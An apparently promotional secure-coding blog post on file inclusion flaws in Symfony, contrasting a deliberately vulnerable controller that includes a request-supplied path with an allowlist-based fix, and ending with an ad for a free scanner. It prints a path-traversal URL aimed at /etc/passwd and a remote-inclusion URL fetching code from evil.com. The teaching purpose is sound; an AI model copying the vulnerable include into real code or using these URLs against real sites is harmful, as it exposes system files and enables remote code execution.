Prevent File Inclusion Vulnerability in Symfony

File inclusion vulnerability in Symfony is a critical security flaw that can lead to unauthorized access to sensitive files or remote code execution. Symfony, a widely-used PHP framework, provides powerful templating and routing features—but misusing them can open doors to severe vulnerabilities.

In this post, we’ll cover:

• What is a file inclusion vulnerability?

• How it affects Symfony apps

• Code examples of insecure and secure implementations

• How to detect this vulnerability using our Free Website Security Scanner

• A detailed security report screenshot example

• Our specialized Web App Penetration Testing Service

• More educational content at Pentest Testing Blog
  
  

📌 What is a File Inclusion Vulnerability?

A file inclusion vulnerability occurs when an application dynamically includes files without properly validating the input. It allows attackers to include local or remote files, potentially leading to:

• Disclosure of sensitive configuration files (e.g., .env, config.yml)

• Execution of arbitrary PHP code

• Complete compromise of the web server
  
  

⚠️ File Inclusion in Symfony: How It Happens

Symfony uses Twig as the templating engine. Twig itself is secure, but improper use of native PHP methods in Symfony controllers can introduce vulnerabilities.

🔍 Vulnerable Symfony Example:

// src/Controller/UnsafeController.php

namespace App\Controller;

use Symfony\Component\HttpFoundation\Request;

use Symfony\Component\HttpFoundation\Response;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class UnsafeController extends AbstractController

{

    public function includeFile(Request $request): Response

    {

        $page = $request->get('page'); // Dangerous input

        $filePath = '../templates/' . $page . '.php';

        if (file_exists($filePath)) {

            include($filePath); // File inclusion vulnerability

        }

        return new Response('Page loaded');

    }

}

🧨 What Could Go Wrong?

An attacker could access a file like:

https://example.com/include?page=../../../../etc/passwd

Or even:

https://example.com/include?page=http://evil.com/malicious.php

This leads to Local File Inclusion (LFI) or Remote File Inclusion (RFI).

✅ Secure Symfony Implementation

Avoid raw include() or require() in Symfony controllers. Instead, use Twig with strict routing and allowlisting:

// src/Controller/SafeController.php

namespace App\Controller;

use Symfony\Component\HttpFoundation\Request;

use Symfony\Component\HttpFoundation\Response;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class SafeController extends AbstractController

{

    public function includePage(Request $request): Response

    {

        $page = $request->get('page');

        $allowedPages = ['home', 'about', 'contact'];

        if (!in_array($page, $allowedPages)) {

            throw $this->createNotFoundException('Page not allowed');

        }

        return $this->render($page . '.html.twig');

    }

}

✅ Security Tips:

• Avoid dynamic includes entirely.

• Use Twig templates with sanitized inputs.

• Validate input using in_array() or whitelist strategy.

• Enable Symfony debug mode only in development.
  
  

🔍 Scan Your Website for File Inclusion Vulnerabilities

You can test your website for vulnerabilities like File Inclusion, XSS, and SQLi using our Free Website Vulnerability Scanner Tool:

👉 Check your site now

📷 Screenshot 1 – Free Tool Homepage

A screenshot of the homepage of the Website Vulnerability Scanner tool

Screenshot of the free tools webpage where you can access security assessment tools.